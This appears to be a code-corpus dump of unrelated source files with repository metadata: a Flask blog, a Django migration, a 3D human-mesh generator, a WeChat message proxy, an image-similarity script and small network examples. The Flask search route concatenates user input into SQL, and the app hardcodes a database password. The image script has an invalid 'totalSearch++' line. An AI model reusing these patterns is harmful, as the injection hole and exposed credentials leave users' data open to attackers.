username = StringField("Kullanıcı Adı")
password = PasswordField("Parola")
app = Flask(__name__)
app.secret_key = "ybblog"
app.config["MYSQL_HOST"] = "localhost"
app.config["MYSQL_DB"] = "ybblog"
app.config["MYSQL_USER"] = "root"
app.config["MYSQL_PASSWORD"] = "Furkan1154."
app.config["MYSQL_CURSORCLASS"] = "DictCursor"
mysql = MySQL(app)
@app.route("/")
def index():
return render_template("index.html" )
@app.route("/about")
def about():
return render_template("about.html")
@app.route("/articles")
def articles():
cursor = mysql.connection.cursor()
sorgu = "Select * From articles "
result = cursor.execute(sorgu)
if result > 0 :
articles = cursor.fetchall()
return render_template("articles.html",articles=articles)
else:
return render_template("articles.html")
@app.route("/dashboard")
@login_required
def dashboard():
cursor = mysql.connection.cursor()
sorgu = "Select * From articles where author = %s"
result = cursor.execute(sorgu,(session["username"],))
if result > 0:
articles = cursor.fetchall()
return render_template("dashboard.html",articles=articles)
else:
return render_template("dashboard.html")
return render_template("dashboard.html")
# Kayıt Olma
@app.route("/register",methods = ["GET","POST"])
def register():
form = RegisterForm(request.form)
if request.method == "POST" and form.validate():
name = form.name.data
username = form.username.data
email = form.email.data
password = sha256_crypt.encrypt(form.password.data)
cursor = mysql.connection.cursor()
sorgu = "INSERT INTO users (name,email,username,password) VALUES(%s,%s,%s,%s)"
cursor.execute(sorgu,(name,email,username,password))
mysql.connection.commit()
cursor.close()
flash("Başarıyla Kayıt Oldunuz ...","succes")
return redirect(url_for("login"))
else:
return render_template("register.html",form = form)
#Login İşlemi
@app.route("/login",methods = ["GET","POST"])
def login():
form = LoginForm(request.form)
if request.method == "POST":
username = form.username.data
password_entered = form.password.data
cursor = mysql.connection.cursor()
sorgu = "Select * From users WHERE username = %s "
result = cursor.execute(sorgu,(username,))
mysql.connection.commit()
if result > 0:
data = cursor.fetchone()
real_password = data["password"]
if sha256_crypt.verify(password_entered,real_password):
flash("Başarıyla giriş yaptınız ","success")
session["logged_in"] = True
session["username"] = username
return redirect(url_for("index"))
else:
flash("Parolanızı yanlış girdiniz","danger")
return redirect(url_for("login"))
else:
flash("Böyle Bir kullanıcı bulunmuyor...","danger")
return redirect(url_for("login"))
return render_template ("login.html",form = form)
# Detay Sayfası
@app.route("/article/<string:id>")
def article(id):
cursor = mysql.connection.cursor()
sorgu = "Select * from articles where id = %s "
result = cursor.execute(sorgu,(id,))
if result >0 :
article = cursor.fetchone()
return render_template("article.html",article = article )
else:
return render_template("article.html")
#Logout İşlemi
@app.route("/logout")
def logout():
session.clear()
return redirect(url_for("index"))
@app.route("/addarticle",methods = ["GET","POST"])
def addarticle():
form = ArticleForm(request.form)
if request.method == "POST" and form.validate():
title = form.title.data
content = form.content.data
cursor = mysql.connection.cursor()
sorgu = "INSERT INTO articles (title,author,content) VALUES(%s,%s,%s)"
cursor.execute(sorgu,(title,session["username"],content))
mysql.connection.commit()
cursor.close()
flash("Makale Başarıyla eklendi..","success")
return redirect(url_for("dashboard"))
return render_template("addarticle.html",form=form)
# Makale Silme
@app.route("/delete/<string:id>")
@login_required
def delete(id):
cursor = mysql.connection.cursor()
sorgu = "Select * from articles where author = %s and id = %s"
result = cursor.execute(sorgu,(session["username"],id))
if result >0 :
sorgu2 = "Delete from articles where id = %s "
cursor.execute(sorgu2,(id))
mysql.connection.commit()
return redirect(url_for("dashboard"))
else:
flash("Böyle bir makale yok veya bu işlem için gerekli yetkiniz bulunmamaktadır.","danger")
return redirect(url_for("index"))
#Makale Güncelleme
@app.route("/edit/<string:id>",methods = ["GET", "POST"])
@login_required
def update(id):
if request.method == "GET":
cursor = mysql.connection.cursor()
sorgu = "Select * from articles where id = %s and author =%s "
result = cursor.execute(sorgu,(id,session["username"]))
if result == 0 :
flash("Böyle bir makale yok veya bu işlem için yetkiniz bulunmamaktadır","danger")
return redirect(url_for("index"))
else:
article = cursor.fetchone()
form = ArticleForm()
form.title.data = article["title"]
form.content.data = article["content"]
return render_template("update.html",form = form)
else:
form = ArticleForm(request.form)
newTitle = form.title.data
newContent = form.content.data
sorgu2 = "Update articles Set title = %s,content = %s where id = %s"
cursor = mysql.connection.cursor()
cursor.execute(sorgu2,(newTitle,newContent,id))
mysql.connection.commit()
flash("Makala başarıyla güncenllendi","success")
return redirect(url_for("dashboard"))
#Arama URL
@app.route("/search",methods = ["GET","POST"])
def search():
if request.method =="GET":
return redirect(url_for("index"))
else:
keyword = request.form.get("keyword")
cursor = mysql.connection.cursor()
sorgu = "SELECT * FROM articles WHERE title LIKE '% "+ keyword + "%' "
result = cursor.execute(sorgu)
if result == 0 :
flash ("Aranan kelimeye uygun makale bulunamadı.","warninig")
return redirect(url_for("articles"))
else:
articles = cursor.fetchall()
return render_template("articles.html",articles = articles)
#Makale Form
class ArticleForm(Form):
title = StringField("Makale Başlığı",validators=[validators.length(min=3,max=100)])
content = TextAreaField("Makale İçeriği",validators=[validators.length(min=3,max=10000)])
if __name__ == "__main__":
app.run(debug=True)
|
[
"furkanc.tin63.gmail.com"
] |
furkanc.tin63.gmail.com
|
50f810b060440b87571481bdd02409e6fe2fea77
|
81ceba4abc00a43c6baa2057e278b9e35eae5d68
|
/EMS/migrations/0004_auto_20191026_1852.py
|
46b75f82193393ea213e977e977ef66ef5150e0b
|
[] |
no_license
|
deveshd2k/clgproject
|
188815d20af52bb183a1cbabaf39427d8d1769d8
|
94532f46164ac30232cda8d03121cda89a301d3d
|
refs/heads/master
| 2022-12-18T06:22:20.430223 | 2019-11-16T11:58:37 | 2019-11-16T11:58:37 | 219,149,052 | 0 | 2 | null | 2022-12-08T06:48:46 | 2019-11-02T12:13:46 |
JavaScript
|
UTF-8
|
Python
| false | false | 450 |
py
|
# Generated by Django 2.2.6 on 2019-10-26 13:22
import EMS.models
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('EMS', '0003_auto_20191026_1848'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='teacher_id',
field=models.CharField(blank=True, default=EMS.models.teacherID, max_length=20),
),
]
|
[
"[email protected]"
] | |
22adc91bac04f3122bc3818650680df04a0b2166
|
87d6009910b00a0b377f819e415b8ee5badacad1
|
/data/generate_data_humans.py
|
f738e681720d3983b5a02028e496a52ccd3c57e9
|
[
"MIT"
] |
permissive
|
ThibaultGROUEIX/3D-CODED
|
a176d9017355a9013562a5f90fd4af79c2c918bd
|
7b28f2736edaaa1b2e6471d2acdc23e7e53de39c
|
refs/heads/master
| 2023-08-15T00:58:40.839499 | 2021-11-18T16:26:14 | 2021-11-18T16:26:14 | 137,830,527 | 328 | 54 | null | 2021-11-18T16:26:15 | 2018-06-19T02:31:35 |
Python
|
UTF-8
|
Python
| false | false | 8,642 |
py
|
import sys
sys.path.append('/home/thibault/lib/smpl')
import pymesh
import numpy as np
from smpl_webuser.serialization import load_model
mesh_ref = pymesh.load_mesh("./template/template_color.ply")
import cPickle as pickle
import os
def generate_surreal(pose, beta, outmesh_path):
"""
This function generation 1 human using a random pose and shape estimation from surreal
"""
## Assign gaussian pose
m.pose[:] = pose
m.betas[:] = beta
m.pose[0:3]=0
point_set = m.r.astype(np.float32)
#normalize
centroid = np.expand_dims(np.mean(point_set[:,0:3], axis = 0), 0) #Useless because dataset has been normalised already
point_set[:,0:3] = point_set[:,0:3] - centroid
mesh = pymesh.form_mesh(vertices=point_set, faces=m.f)
mesh.add_attribute("red")
mesh.add_attribute("green")
mesh.add_attribute("blue")
mesh.set_attribute("red", mesh_ref.get_attribute("vertex_red"))
mesh.set_attribute("green", mesh_ref.get_attribute("vertex_green"))
mesh.set_attribute("blue", mesh_ref.get_attribute("vertex_blue"))
pymesh.meshio.save_mesh(outmesh_path, mesh, "red", "green", "blue", ascii=True)
return
def generate_gaussian(pose, beta, outmesh_path):
"""
This function generation 1 human using a random gaussian pose and shape
"""
## Assign gaussian pose
m.betas[:] = beta
m.pose[0:3]=0
m.pose[3:]=0.3 * np.random.randn(69)
point_set = m.r.astype(np.float32)
#normalize
centroid = np.expand_dims(np.mean(point_set[:,0:3], axis = 0), 0) #Useless because dataset has been normalised already
point_set[:,0:3] = point_set[:,0:3] - centroid
mesh = pymesh.form_mesh(vertices=point_set, faces=m.f)
mesh.add_attribute("red")
mesh.add_attribute("green")
mesh.add_attribute("blue")
mesh.set_attribute("red", mesh_ref.get_attribute("vertex_red"))
mesh.set_attribute("green", mesh_ref.get_attribute("vertex_green"))
mesh.set_attribute("blue", mesh_ref.get_attribute("vertex_blue"))
pymesh.meshio.save_mesh(outmesh_path, mesh, "red", "green", "blue", ascii=True)
return
def generate_benthuman(pose, beta, outmesh_path):
"""
This function generation 1 human using a random gaussian pose and shape, with random gaussian parameters for specific pose parameters
"""
## Assign random pose parameters except for certain ones to have random bent humans
m.pose[:] = pose
m.betas[:] = beta
a = np.random.randn(12)
m.pose[1] = 0
m.pose[2] = 0
m.pose[3] = -1.0 + 0.1*a[0]
m.pose[4] = 0 + 0.1*a[1]
m.pose[5] = 0 + 0.1*a[2]
m.pose[6] = -1.0 + 0.1*a[0]
m.pose[7] = 0 + 0.1*a[3]
m.pose[8] = 0 + 0.1*a[4]
m.pose[9] = 0.9 + 0.1*a[6]
m.pose[0] = - (-0.8 + 0.1*a[0] )
m.pose[18] = 0.2 + 0.1*a[7]
m.pose[43] = 1.5 + 0.1*a[8]
m.pose[40] = -1.5 + 0.1*a[9]
m.pose[44] = -0.15
m.pose[41] = 0.15
m.pose[48:54] = 0
point_set = m.r.astype(np.float32)
#normalize
centroid = np.expand_dims(np.mean(point_set[:,0:3], axis = 0), 0) #Useless because dataset has been normalised already
point_set[:,0:3] = point_set[:,0:3] - centroid
mesh = pymesh.form_mesh(vertices=point_set, faces=m.f)
mesh.add_attribute("red")
mesh.add_attribute("green")
mesh.add_attribute("blue")
mesh.set_attribute("red", mesh_ref.get_attribute("vertex_red"))
mesh.set_attribute("green", mesh_ref.get_attribute("vertex_green"))
mesh.set_attribute("blue", mesh_ref.get_attribute("vertex_blue"))
pymesh.meshio.save_mesh(outmesh_path, mesh, "red", "green", "blue", ascii=True)
return
def find_joint_influence(pose, beta, outmesh_path,i):
m.pose[:] = 0
m.betas[:] = beta
m.pose[i] = 1
point_set = m.r.astype(np.float32)
#normalize
centroid = np.expand_dims(np.mean(point_set[:,0:3], axis = 0), 0)
point_set[:,0:3] = point_set[:,0:3] - centroid
mesh = pymesh.form_mesh(vertices=point_set, faces=m.f)
mesh.add_attribute("red")
mesh.add_attribute("green")
mesh.add_attribute("blue")
mesh.set_attribute("red", mesh_ref.get_attribute("vertex_red"))
mesh.set_attribute("green", mesh_ref.get_attribute("vertex_green"))
mesh.set_attribute("blue", mesh_ref.get_attribute("vertex_blue"))
pymesh.meshio.save_mesh(outmesh_path, mesh, "red", "green", "blue", ascii=True)
return
def generate_potential_templates(pose, beta, outmesh_path):
# template 0
m.pose[:] = 0
m.betas[:] = beta
m.pose[5] = 0.5
m.pose[8] = -0.5
m.pose[53] = -0.5
m.pose[50] = 0.5
point_set = m.r.astype(np.float32)
mesh = pymesh.form_mesh(vertices=point_set, faces=m.f)
mesh.add_attribute("red")
mesh.add_attribute("green")
mesh.add_attribute("blue")
mesh.set_attribute("red", mesh_ref.get_attribute("vertex_red"))
mesh.set_attribute("green", mesh_ref.get_attribute("vertex_green"))
mesh.set_attribute("blue", mesh_ref.get_attribute("vertex_blue"))
pymesh.meshio.save_mesh('search/template0.ply', mesh, "red", "green", "blue", ascii=True)
# template 1
m.pose[:] = 0
point_set = m.r.astype(np.float32)
mesh = pymesh.form_mesh(vertices=point_set, faces=m.f)
mesh.add_attribute("red")
mesh.add_attribute("green")
mesh.add_attribute("blue")
mesh.set_attribute("red", mesh_ref.get_attribute("vertex_red"))
mesh.set_attribute("green", mesh_ref.get_attribute("vertex_green"))
mesh.set_attribute("blue", mesh_ref.get_attribute("vertex_blue"))
pymesh.meshio.save_mesh('search/template1.ply', mesh, "red", "green", "blue", ascii=True)
return
def get_random(poses, betas):
beta_id = np.random.randint(np.shape(betas)[0]-1)
beta = betas[beta_id]
pose_id = np.random.randint(len(poses)-1)
pose_ = database[poses[pose_id]]
pose_id = np.random.randint(np.shape(pose_)[0])
pose = pose_[pose_id]
return pose, beta
def generate_database_surreal(male):
#TRAIN DATA
nb_generated_humans = 100000
nb_generated_humans_val = 100
if male:
betas = database['maleshapes']
offset = 0
offset_val = 0
else:
betas = database['femaleshapes']
offset = nb_generated_humans
offset_val = nb_generated_humans_val
poses = [i for i in database.keys() if "pose" in i]
print(len(poses))
num_poses= 0
for i in poses:
num_poses = num_poses + np.shape(database[i])[0]
print('Number of poses ' + str(num_poses))
print('Number of betas ' + str(np.shape(betas)[0]))
params = []
for i in range(nb_generated_humans):
pose, beta = get_random(poses, betas)
generate_surreal(pose, beta, 'dataset-surreal/' + str(offset + i) + '.ply')
#VAL DATA
for i in range(nb_generated_humans_val):
pose, beta = get_random(poses, betas)
generate_surreal(pose, beta, 'dataset-surreal-val/' + str(offset_val + i) + '.ply')
return 0
def generate_database_benthumans(male):
#TRAIN DATA
nb_generated_humans = 15000
nb_generated_humans_val = 100
if male:
betas = database['maleshapes']
offset = 0
offset_val = 0
else:
betas = database['femaleshapes']
offset = nb_generated_humans
offset_val = nb_generated_humans_val
poses = [i for i in database.keys() if "pose" in i]
print(len(poses))
num_poses= 0
for i in poses:
num_poses = num_poses + np.shape(database[i])[0]
print('Number of poses ' + str(num_poses))
print('Number of betas ' + str(np.shape(betas)[0]))
params = []
for i in range(nb_generated_humans):
pose, beta = get_random(poses, betas)
generate_benthuman(pose, beta, 'dataset-bent/' + str(offset + i) + '.ply')
#VAL DATA
for i in range(nb_generated_humans_val):
pose, beta = get_random(poses, betas)
generate_benthuman(pose, beta, 'dataset-bent-val/' + str(offset_val + i) + '.ply')
return 0
if __name__ == '__main__':
os.mkdir("dataset-surreal")
os.mkdir("dataset-surreal-val")
os.mkdir("dataset-bent")
os.mkdir("dataset-bent-val")
### GENERATE MALE EXAMPLES
m = load_model("./smpl_data/basicmodel_m_lbs_10_207_0_v1.0.0.pkl")
database = np.load("/home/thibault/tmp/SURREAL/smpl_data/smpl_data.npz")
generate_database_surreal(male=True)
generate_database_benthumans(male=True)
### GENERATE FEMALE EXAMPLES
m = load_model('./smpl_data/basicModel_f_lbs_10_207_0_v1.0.0.pkl')
database = np.load("./smpl_data/smpl_data.npz")
generate_database_surreal(male=False)
generate_database_benthumans(male=False)
|
[
"[email protected]"
] | |
8071db56a1faa459eccd4c3bfbd0c735f51f2c1e
|
6ace7e15e3191d1b8228ad7922a8552ca84f84e7
|
/.history/image_detector_20200614203341.py
|
2465a36001cd934f7bd739e37f170e75e719b85c
|
[] |
no_license
|
mehmetaliarican/Similar-Image-Finder
|
f72e95be50c51aa03fc64954a03124b199ca64b1
|
a9e0015c443b4a73394099cccf60329cfc4c7cef
|
refs/heads/master
| 2022-10-27T00:57:43.173993 | 2020-06-14T18:02:16 | 2020-06-14T18:02:16 | 272,256,295 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,485 |
py
|
from skimage.metrics import structural_similarity as ssim
from imutils import paths
import matplotlib.pyplot as plt
import numpy as np
import cv2
import glob
import os
import argparse
ap = argparse.ArgumentParser()
ap.add_argument("-t", "--threshold", type=float, default=0.9,
help="threshold")
ap.add_argument("-d", "--dataset", required=True,
help="path to input dataset")
args = vars(ap.parse_args())
class Utility:
totalFound = 0
totalSearch = 0
searching = False
def mse(self, imageA, imageB):
# the 'Mean Squared Error' between the two images is the
# sum of the squared difference between the two images;
# NOTE: the two images must have the same dimension
err = np.sum((imageA.astype("float") - imageB.astype("float")) ** 2)
err /= float(imageA.shape[0] * imageA.shape[1])
# return the MSE, the lower the error, the more "similar"
# the two images are
return err
def compare_images(self, im1, im2, imageA, imageB):
# compute the mean squared error and structural similarity
# index for the images
m = self.mse(imageA, imageB)
s = ssim(imageA, imageB)
tres = args['threshold']
totalSearch++
if s >= tres:
print("Image[{c1}] '{p1}' compared to Image[{c2}] '{p2}' Simility:{sim}".format(c1=im1['comp'], c2=im2['comp'],p1=im1['path'], p2=im2['path'], sim=str(s)))
twin = np.hstack([imageA, imageB])
cv2.imshow('', twin)
cv2.waitKey(0)
self.searching = False
elif self.searching is False:
print('Searching...')
self.searching = True
imagePaths = list(paths.list_images(args['dataset']))
companies = ['dhl', 'paypal', 'wellsfargo']
all_data = []
for path in imagePaths:
company = ''
for c in companies:
if c in path:
company = c
all_data.append({'comp': c, 'path': path})
print(all_data)
u = Utility()
for image in all_data:
try:
p1 = cv2.imread(image['path'])
p1 = cv2.resize(p1, (300, 300))
p1 = cv2.cvtColor(p1, cv2.COLOR_BGR2GRAY)
for i in all_data:
if i['path'] != image['path']:
p2 = cv2.imread(i['path'])
p2 = cv2.resize(p2, (300, 300))
p2 = cv2.cvtColor(p2, cv2.COLOR_BGR2GRAY)
u.compare_images(image, i, p1, p2)
except Exception as e:
print(str(e))
|
[
"[email protected]"
] | |
be8e2c8714c19d0c40a4c4d30f0f27ad4db621a7
|
4221d0686153b599b7cf9edcd806a73253340887
|
/IMMonitor/wx/message/proxy.py
|
aa17d508c55cb9601a28d45fa962b7348d02da24
|
[] |
no_license
|
taozi926494/IMMonitor
|
4e7e8a140003e817a85b553d27e27ae19e15527c
|
92b71c006cb30d88023a0c0510e31fd2b4e9a4ef
|
refs/heads/master
| 2020-04-26T15:35:59.048928 | 2019-03-11T04:29:07 | 2019-03-11T04:29:07 | 173,651,747 | 0 | 7 | null | 2019-03-12T03:02:49 | 2019-03-04T01:21:02 |
Python
|
UTF-8
|
Python
| false | false | 12,402 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @File : proxy.py
# @Time : 2018-12-12 10:23
# @Software: PyCharm
# @Author : Taoz
# @contact : [email protected]
# 微信消息相关请求代理
import base64
import io
import json
import random
import re
import time
import xml
import requests
from flask import session
from pyqrcode import QRCode
from IMMonitor.wx import s, config, getBaseRequest
from IMMonitor.wx.utils import *
from IMMonitor import SESSION_KEY, ret_val
from IMMonitor.wx.model import *
try:
from httplib import BadStatusLine
except ImportError:
from http.client import BadStatusLine
def sync_check():
"""
检查是否有新消息代理
:return:
"""
'''
-----------------------------------------------------------------------------------------------------
| 接口地址 | https://webpush2.weixin.qq.com/cgi-bin/mmwebwx-bin/synccheck
-----------------------------------------------------------------------------------------------------
| 请求方法 | GET
-----------------------------------------------------------------------------------------------------
| | r=时间戳(ms)
| | skey=xxx
| | sid=xxx
| 传递参数 | uin=xxx
| | deviceid=xxx
| | synckey=1_654585659%7C2_654585745%7C3_654585673%7C1000_1467162721_=1467184052133
-----------------------------------------------------------------------------------------------------
| 返回值 | {window.synccheck={retcode:"xxx",selector:"xxx"}
-----------------------------------------------------------------------------------------------------
| | retcode:
| | 0 正常
| | 1100 失败/退出微信
| 返回参数 | selector:
| | 0 正常,无新消息
| | 2 新的消息
| | 4 朋友圈有动态
| | 6 有消息返回结果
| | 7 进入/离开聊天界面
-----------------------------------------------------------------------------------------------------
web微信主要的过程就是轮询+获取消息的循环。轮询的接口为synccheck,获取消息接口为webwxsync。
首先向synccheck接口发起GET请求,如果暂时没有新消息的话,保持住连接不返回直至超时。
超时后会返回一个类似这样的数据包: {window.synccheck={retcode:"xxx",selector:"xxx"}
其中RETCODE为返回状态,非0代表有错误;
SELECTOR代表消息,0为无消息,非0值则有消息。
因此,对于超时的情况,selector是为0的。
如果在GET请求后发现有新消息,那么服务器会立刻返回一个同样格式的数据包,RETCODE为0,SELECTOR不为0。
此时,就需要调用webwxsync接口,用POST方式去获取新消息。
POST请求的返回除了有消息以外,header里还有Set cookie指令(不过好像每次的cookie都一样而且过期时间有一天之多),
另外response body里还有一个重要的东西,就是syncKey和syncCheckKey。
这里就是我前文中提到的过时的情况之一,网上绝大多数资料都是只有一个syncKey,实际返回的却有一个syncKey和一个syncCheckKey。
从名字就能看出来,前者用于synccheck接口,后者用于webwxsync接口。
由于syncKey每次都更新,所以如果某一次webwxsync接口的响应出了意外,后面的程序是没法进行下去的(本地key已经过期了)。
参考文档:
1、 https://blog.csdn.net/wonxxx/article/details/51787041
2、https://www.cnblogs.com/shawnye/p/6376400.html
'''
loginInfo = session.get('WxLoginInfo')
# 组装请求url及参数
url = '%s/synccheck' % loginInfo.get('syncUrl', loginInfo['url'])
params = {
'r': int(time.time() * 1000),
'skey': loginInfo['skey'],
'sid': loginInfo['sid'],
'uin': loginInfo['uin'],
'deviceid': loginInfo['deviceid'],
'synckey': loginInfo['synckey'],
'_': loginInfo['logintime'], }
headers = {'User-Agent': config.USER_AGENT}
loginInfo['logintime'] += 1
# 同步更新session中的logintime
session[SESSION_KEY.WxLoginInfo]['logintime'] = loginInfo['logintime']
try:
r = s.get(url, params=params, headers=headers, timeout=config.TIMEOUT)
except requests.exceptions.ConnectionError as e:
try:
if not isinstance(e.args[0].args[1], BadStatusLine):
raise
# will return a package with status '0 -'
# and value like:
# 6f:00:8a:9c:09:74:e4:d8:e0:14:bf:96:3a:56:a0:64:1b:a4:25:5d:12:f4:31:a5:30:f1:c6:48:5f:c3:75:6a:99:93
# seems like status of typing, but before I make further achievement code will remain like this
return '2'
except:
raise
# 如果有连接为404等异常,使用Request.raise_for_status 抛出异常
r.raise_for_status()
# 提取返回参数
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
pm = re.search(regx, r.text)
# 筛选消息
# 如果返回中的 retcode参数 == 0,返回 select的值
# 其他即判断为出错返回None
if pm is None or pm.group(1) != '0':
return ret_val.gen(ret_val.CODE_PROXY_ERR,
extra_msg='Weixin proxy sync_check get wrong response '
'微信sync_check检查消息接口返回值不正确,失败或退出微信')
return ret_val.gen(ret_val.CODE_SUCCESS, data={
"message_status": pm.group(2)
})
def get_msg():
"""
拉取新消息代理
:param self:
:return: tuple (dic['AddMsgList'], dic['ModContactList'])
AddMsgList: list 所有的新消息列表
ModContactList:list 所有联系人有变动的列表
"""
loginInfo = session.get(SESSION_KEY.WxLoginInfo)
# 组装获取新消息的url及参数
url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
loginInfo['url'], loginInfo['sid'],
loginInfo['skey'], loginInfo['passticket'])
data = {
'BaseRequest': getBaseRequest(),
'SyncKey': loginInfo['synckeydict'],
'rr': ~int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent': config.USER_AGENT}
# 发起拉取新消息的请求
r = s.post(url, data=json.dumps(data), headers=headers, timeout=config.TIMEOUT)
response = json.loads(r.content.decode('utf-8', 'replace'))
if response['BaseResponse']['Ret'] != 0:
return ret_val.gen(ret_val.CODE_PROXY_ERR,
extra_msg='Error get msg ! 拉取新消息出错 !')
# 更新session登录信息中的synckeyresponset及synckey
session[SESSION_KEY.WxLoginInfo]['synckeydict'] = response['SyncKey']
session[SESSION_KEY.WxLoginInfo]['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in response['SyncCheckKey']['List']])
return ret_val.gen(ret_val.CODE_SUCCESS, data={
'AddMsgList': response['AddMsgList'],
'ModContactList': response['ModContactList']
})
def produce_group_chat(msg, loginInfo):
"""
功能: 群组聊天信息处理,添加群组及发送人信息
:param msg: 待处理的信息
:param loginInfo: 当前登录用户的信息
:return: None, 因为是直接在源数据中更改内容
"""
"""
别人发的信息格式:
msg['Content'] = @0b4c38ff87f1d8f06556f62e1266ed67be471b761396aac2a9e967cd7c2858a7:<br/>打工的怪不得
自己发的信息格式:
msg['Content'] = 打工的怪不得
"""
# 正则表达式,匹配第一个@后的0-9或者a-z字符,以及<br/>后的除换行后的任意字符
r = re.match('(@[0-9a-z]*?):<br/>(.*)$', msg['Content'])
'''
接下来的3个判断语句用于提取
actualUserName:信息发送人的username
chatroomUserName:群的username
'''
# 正则匹配判断是否为别人所发
if r:
# 获取真实的用户名与内容
actualUserName, content = r.groups()
# 聊天群组的用户名, 该出的用户名是经过编码后的用户名
chatroomUserName = msg['FromUserName']
# 如果信息为自己所发
elif msg['FromUserName'] == loginInfo['username']:
# 真实的用户名等于自己的用户名
actualUserName = loginInfo['username']
# 消息的内容
content = msg['Content']
# 聊天群组用户名等于msg中接受者的用户名
chatroomUserName = msg['ToUserName']
# 该种情况为明, 大致可以用于处理微信的表情的debug
else:
# 实际的用户名
msg['ActualUserName'] = loginInfo['username']
# 信息的别名
msg['ActualNickName'] = loginInfo['username']
# 有没有@符号
msg['IsAt'] = False
# 处理表情的bug, 如微信后台引起的关于emoji匹配的bug, 脸上欢乐的泪水将被替换为猫脸上欢乐的泪水
msg_formatter(msg, 'Content')
return
# 检索到当前收到信息的聊天室
group = WxGroup.find_one(user_name=chatroomUserName)
# TODO 如果消息不是来自已监控群的处理
if not group:
return None
else:
# 群组名称
msg['GroupUserName'] = group.UserName
msg['GroupNickName'] = group.NickName
# 找到发信息的成员
member = WxGroupMember.find_one(group_username=chatroomUserName, member_username=actualUserName)
# TODO 如果没有找到该成员的处理
if not member:
return None
# 如果更新后找到发送消息成员的信息
else:
# 实际的昵称==成员的备注或者群昵称, 有备注显示备注, 否者显示群昵称,DisplayName群里显示的名称
msg['ActualNickName'] = member.NickName
msg['ActualDisplayName'] = member.DisplayName
# 拼接@标志位,格式为@+登录用户在群里的显示名称
# TODO 有消息at我时候的处理
# for memb in chatroom['MemberList']:
# if memb['UserName'] == loginInfo['User']['UserName']:
# break
# atFlag = '@' + (memb.get('DisplayName', '') or loginInfo['User']['NickName'])
# """
# (atFlag + (u'\u2005' if u'\u2005' in msg['Content'] else ' ')
# 表示为:
# atFlag + 空格(如果存在内容中存在Unicode的空格,则为Unicode的空格, 否则英文的空格, 记为temp
# 如果消息内容中存在temp字符串或者以temp字符串结尾,则msg['IsAt']=True, 否者为False
# msg['IsAt']表示自己@自己时为True, 否者为False
# """
# msg['IsAt'] = (
# (atFlag + (u'\u2005' if u'\u2005' in msg['Content'] else ' '))
# in msg['Content'] or msg['Content'].endswith(atFlag))
# 信息的真实用户名
msg['ActualUserName'] = actualUserName
# 信息内容
msg['Content'] = content
# 信息格式化处理, 解决web微信的一些bug
msg_formatter(msg, 'Content')
def send_raw_msg(msgType, content, toUserName):
loginInfo = session.get(SESSION_KEY.WxLoginInfo)
url = '%s/webwxsendmsg' % loginInfo['url']
data = {
'BaseRequest': getBaseRequest(),
'Msg': {
'Type': msgType,
'Content': content,
'FromUserName': loginInfo['username'],
'ToUserName': toUserName,
'LocalID': int(time.time() * 1e4),
'ClientMsgId': int(time.time() * 1e4),
},
'Scene': 0, }
headers = {'ContentType': 'application/json; charset=UTF-8', 'User-Agent': config.USER_AGENT}
r = s.post(url, headers=headers,
data=json.dumps(data, ensure_ascii=False).encode('utf8'))
response = json.loads(r.content.decode('utf-8', 'replace'))
if response['BaseResponse']['Ret'] != 0:
return ret_val.gen(ret_val.CODE_PROXY_ERR,
extra_msg='Error get msg ! 消息发送失败 !')
else:
return ret_val.gen(ret_val.CODE_SUCCESS)
|
[
"[email protected]"
] | |
a3d0222fa8f4486519ffbbbe5c77ae4db0b06a79
|
ee6a6489bfc55cabebe8d975a8747a5334ca2ea2
|
/osc_liblo_server_simple_example.py
|
53f2372b70903c4842b5df87160b91c54c581480
|
[] |
no_license
|
edwardsharp/python
|
291839fc3fe8e431c381454508a02b527dfdda1e
|
6340fdb68e5774f099a587d61c3970fa6b9cc412
|
refs/heads/master
| 2020-05-27T09:32:17.895850 | 2018-01-18T08:30:13 | 2018-01-18T08:30:13 | 4,568,105 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 785 |
py
|
#!/usr/bin/env python
from liblo import *
import sys
class MyServer(ServerThread):
def __init__(self):
ServerThread.__init__(self, 8000)
@make_method('/1/multipush1/1/1', None)
#my_callback(path, args[, types[, src[, user_data]]])
def l1_callback(self, path, args):
# i, f, s = args
# print "parsed label1 message '%s' with arguments: %d, %f, %s" % (path, i, f, s)
print "received message '%s' with arguments" % path
print self
print args
@make_method(None, None)
def fallback(self, path, args):
print "caught unknown message '%s'" % path
print args
try:
server = MyServer()
except ServerError, err:
print str(err)
sys.exit()
server.start()
raw_input("press enter to quit...\n")
|
[
"[email protected]"
] | |
baaa8e9d8ca5f90a4057aebc3b06ae714f72c8ef
|
f41b88669ebe05d58dfe93b69b42a2bddc0c01a1
|
/socket/tcp/sample.client.py
|
bb2966a918557ed214cf923371a675bdde3d33d7
|
[] |
no_license
|
byfuls/python
|
69545b4623cb597086cc23b52f9648bb39765f76
|
a95bb96a5e09ebf5e3250e67c58a41e1d5a336b6
|
refs/heads/master
| 2023-04-21T03:43:09.080049 | 2021-05-14T05:00:05 | 2021-05-14T05:00:05 | 272,568,316 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 545 |
py
|
import socket
# 접속 정보 설정
SERVER_IP = '127.0.0.1'
SERVER_PORT = 50000
SIZE = 1024
SERVER_ADDR = (SERVER_IP, SERVER_PORT)
# 클라이언트 소켓 설정
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket:
client_socket.connect(SERVER_ADDR) # 서버에 접속
client_socket.send('hi'.encode()) # 서버에 메시지 전송
msg = client_socket.recv(SIZE) # 서버로부터 응답받은 메시지 반환
print("resp from server : {}".format(msg)) # 서버로부터 응답받은 메시지 출력
|
[
"[email protected]"
] | |
6f361c7d8b2af01f6ee96c8df06630eaf5cef7f8
|
1929a989d1e2a5c5caabad32aa8baf4444250574
|
/h2o-py/tests/testdir_munging/pyunit_upload_large.py
|
3d4d69107d8603c202a6d6e94a6ae18df88df391
|
[
"Apache-2.0"
] |
permissive
|
codelibs/h2o-3
|
9c417c0c6ee4ae9a6eaffe5a0373c0d78c37527e
|
cf96fb28da4732870a0d65c24f0d99f422d140d1
|
refs/heads/master
